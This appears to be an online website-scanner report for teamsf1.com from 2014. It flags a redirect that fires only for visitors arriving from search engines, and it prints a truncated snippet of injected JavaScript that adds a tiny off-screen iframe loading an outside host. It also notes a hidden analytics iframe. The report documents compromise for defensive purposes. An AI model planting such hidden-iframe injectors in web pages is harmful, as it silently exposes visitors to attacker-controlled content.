Malicious/Suspicious Redirects
URL: http://teamsf1.com/ (imitation of visitor from search engine)
Status: malicious

Request:
    GET / HTTP/1.1
    Host: teamsf1.com
    Referer: http://www.google.com/search?q=redirect+check1

Server response:
    HTTP/1.1 301 Moved Permanently
    Connection: close
    Date: Fri, 12 Sep 2014 22:01:17 GMT
    Location: http://shinwa-ind.jp/clicker.php
    Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
    Content-Length: 240
    Content-Type: text/html; charset=iso-8859-1
Scanned pages/files
Request | Server response | Status |
http://teamsf1.com/ | 200 OK Content-Length: 15458 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
    function hhmpp09() {
        var static='ajax';
        var controller='index.php';
        var hhmpp = document.createElement('iframe');
        hhmpp.src = 'http://nkbk1.presenthost.net/wbdfCMxk.php';
        hhmpp.style.position = 'absolute';
        hhmpp.style.color = '5';
        hhmpp.style.height = '5px';
        hhmpp.style.width = '5px';
        hhmpp.style.left = '10005';
        hhmpp.style.top = '10005';
        if (!document.getElementById('hhmpp')) {
            document.write('<p id=\'hhmpp\' class=\'hhmpp09\' ></p>');
            document.getElementById('hhmpp').appendChild(hh
Antivirus reports:
http://teamsf1.com/wp-includes/js/jquery/jquery.js?ver=1.7.1 | 200 OK Content-Length: 93889 Content-Type: application/javascript | clean |
http://teamsf1.com/wp-includes/js/hoverIntent.js?ver=20090102 | 200 OK Content-Length: 1334 Content-Type: application/javascript | clean |
http://teamsf1.com/wp-content/plugins/multi-level-navigation-plugin/scripts/superfish.js?ver=1.4.8 | 200 OK Content-Length: 2803 Content-Type: application/javascript | clean |
http://teamsf1.com/wp-content/plugins/multi-level-navigation-plugin/scripts/superfish_settings.js.php?ver=1.0 | 200 OK Content-Length: 387 Content-Type: text/javascript | clean |
http://teamsf1.com/wp-content/themes/gemer/js/jquery-1.3.2.min.js | 200 OK Content-Length: 57254 Content-Type: application/javascript | clean |
http://teamsf1.com/wp-content/themes/gemer<script type= | 404 Not Found Content-Length: 356 Content-Type: text/html | clean |
http://teamsf1.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://teamsf1.com/wp-content/themes/gemer/js/script.js | 200 OK Content-Length: 595 Content-Type: application/javascript | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js | 200 OK Content-Length: 72174 Content-Type: text/javascript | clean |
http://free.stiqr.com/sticker/api | 200 OK Content-Length: 117515 Content-Type: text/javascript | suspicious |
Hidden iFrame found. style: hidden src: http://www.stiqr.com/analytics
    <iframe src='http://www.stiqr.com/analytics' style='display:none;'>
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=teamsf1.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://teamsf1.com/
Result: teamsf1.com is not infected or malware details are not published yet.